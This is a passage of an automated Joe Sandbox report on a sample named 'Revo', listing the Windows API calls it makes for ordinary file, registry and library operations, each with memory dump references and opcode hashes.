                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3712363035-0
                                                                                                                                                                            • Opcode ID: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                                                            • Instruction ID: 678fb2cce29b027916b6e9c77d741f72fc3b9667aac1924bad6fa13dfa27649e
                                                                                                                                                                            • Opcode Fuzzy Hash: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                                                            • Instruction Fuzzy Hash: E6E0BFB4500209BFFB009B64ED49F7B7B7CE704605F008525BD10F2191D774D8159A7D
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                                                              • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                                                              • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                                                                                                                                              • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547128583-0
                                                                                                                                                                            • Opcode ID: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                                                            • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                                                                                                                                            • Opcode Fuzzy Hash: 09a5520475afffee645b4664441d986c1138b09cf986c3d6b2a713b3520f987f
                                                                                                                                                                            • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                                                                                                                                            APIs
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,74DF3420,00000000,74DF2EE0,00403CB6,004D1000,00403BB5,?,?,00000008,0000000A,0000000C), ref: 00403CF9
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00403D00
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$GlobalLibrary
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1100898210-0
                                                                                                                                                                            • Opcode ID: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                                                            • Instruction ID: 6cc7235c82e409e594193dc40a4abc0356c386f753d5776fe34d96f63476a0b8
                                                                                                                                                                            • Opcode Fuzzy Hash: e95d17bfaf349d732f0976dec1ca20856772db7d244860fdb52b783a83313983
                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE012334151305BD6225F59FE0575ABB68BF45F22F05C52FE940BB2A18BB85C424FD8
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                                            • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$AttributesCreate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 415043291-0
                                                                                                                                                                            • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                            • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                                                                                                                                            • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                                                                                                                                            • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                            • Instruction ID: 83b49fe15d4d51a1c27b4b8da2ab4689423c6710ab607d501633f61f971848cf
                                                                                                                                                                            • Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
                                                                                                                                                                            • Instruction Fuzzy Hash: 63D0C972504220BFC2102728AE0889BBB55DB552717028A35FCA9A22B0CB314C6A86A4
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00403658,004D1000,004D1000,004D1000,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                                                                                                                                            • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1375471231-0
                                                                                                                                                                            • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                                                            • Instruction ID: 868687b2a80a8d4cb6d5034857ca3092976d2c25b2f3b55ea206b3a8d14aaeda
                                                                                                                                                                            • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                                                                                                                                            • Instruction Fuzzy Hash: C7C04C30608701DAEA105B31DE8CB177A50BB54741F198439A582F41B0DA348555D92D
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
                                                                                                                                                                            • CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
                                                                                                                                                                            • Instruction ID: 93454ec2f84d486dd0eb46c633a3a61ffb1fb8fcaaff07e214acfe86ea83ea04
                                                                                                                                                                            • Opcode Fuzzy Hash: d2bdcc80eca201cd5359b13114e9f273fde289d40d32cb5243316b7ba4aee94e
                                                                                                                                                                            • Instruction Fuzzy Hash: 33E0863150471496D5206F7CAE4D9853B185F41335765C327F038F21F0C738D95A5AAD
                                                                                                                                                                            APIs
                                                                                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 004016BB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileMove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3562171763-0
                                                                                                                                                                            • Opcode ID: 68bb4f6f7371558e69e9210aa95fbfffb87ec2be4bc2e048b920f3dfebe64502
                                                                                                                                                                            • Instruction ID: 51a81b0a5d784a3e000b48fd00e23250cd6aa6ca0aeb3385d4825347e3700de9
                                                                                                                                                                            • Opcode Fuzzy Hash: 68bb4f6f7371558e69e9210aa95fbfffb87ec2be4bc2e048b920f3dfebe64502
                                                                                                                                                                            • Instruction Fuzzy Hash: A9F09031608112A3CB10B7B55F0ED9F26949F8136CB30463FB112B21E1D6BC8A02966E
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,?,?), ref: 004028D4
                                                                                                                                                                              • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointerwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 327478801-0
                                                                                                                                                                            • Opcode ID: 87c5897e7d26168ae8e73bcafa5ed0f6671dd4abe8b22ba1c793c606c7386a0e
                                                                                                                                                                            • Instruction ID: 6ed73ee8f3319f68a8da4c27dc8c9ca591426a2e8a32d0aa126581893dcb710c
                                                                                                                                                                            • Opcode Fuzzy Hash: 87c5897e7d26168ae8e73bcafa5ed0f6671dd4abe8b22ba1c793c606c7386a0e
                                                                                                                                                                            • Instruction Fuzzy Hash: A4E06D71908104AAEB04ABA5AE59CAE7379AF94345B20443FF101F00E8C6B94D109A2D
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00402917
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                            • Opcode ID: 742a5d2d02c8cd350c2a3ef58f522920eb87d0a7cd3bfa896a74a5719c09783c
                                                                                                                                                                            • Instruction ID: d46dfd92da6d3320027a158c46672eb634da6cf54ac1c691db46aaaef4df00ea
                                                                                                                                                                            • Opcode Fuzzy Hash: 742a5d2d02c8cd350c2a3ef58f522920eb87d0a7cd3bfa896a74a5719c09783c
                                                                                                                                                                            • Instruction Fuzzy Hash: E5E06D72A04105DBDB11DBE5DAAC9AFB3B8EF00348F20447BD102F21E1E7B98A549B19
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406566
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                                                            • Instruction ID: cfc89692b4771faa31f3440cbcbb3328f2b21d62788620711c29387ee39994bc
                                                                                                                                                                            • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                                                                                                                            • Instruction Fuzzy Hash: 94E0BFB2010109BEEF095F50EC0AD7F371DE708210F11452EF946D5051E6B5A9309674
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,00420DE6,0041E6F0,0040359E,0041E6F0,00420DE6,004266F0,00004000,?,00000000,004033C8,00000004), ref: 00406258
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                            • Instruction ID: 50ccb5e768420c5b79bdfebb9096a84dabe54a6ff5c0a4120d9a71b85527c923
                                                                                                                                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                                                                            • Instruction Fuzzy Hash: FDE08C3221821AABCF10BE608C00EEB3B6CEB017A0F02447AFD56E3050D231E83097A8
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,004266F0,0041E6F0,0040361A,00008001,00008001,0040351E,004266F0,00004000,?,00000000,004033C8), ref: 00406229
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                            • Instruction ID: fbac330590941eb325162a4ee9bfa4b3c7313c609e27a1dd4f64d068a4d06545
                                                                                                                                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                                                                            • Instruction Fuzzy Hash: 8FE08632110129ABCF106E549C00EEB375CEF05350F014876F951E3040D730E83187A5
                                                                                                                                                                            APIs
                                                                                                                                                                            • MessageBoxIndirectW.USER32(0040A3E0), ref: 00405D5D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
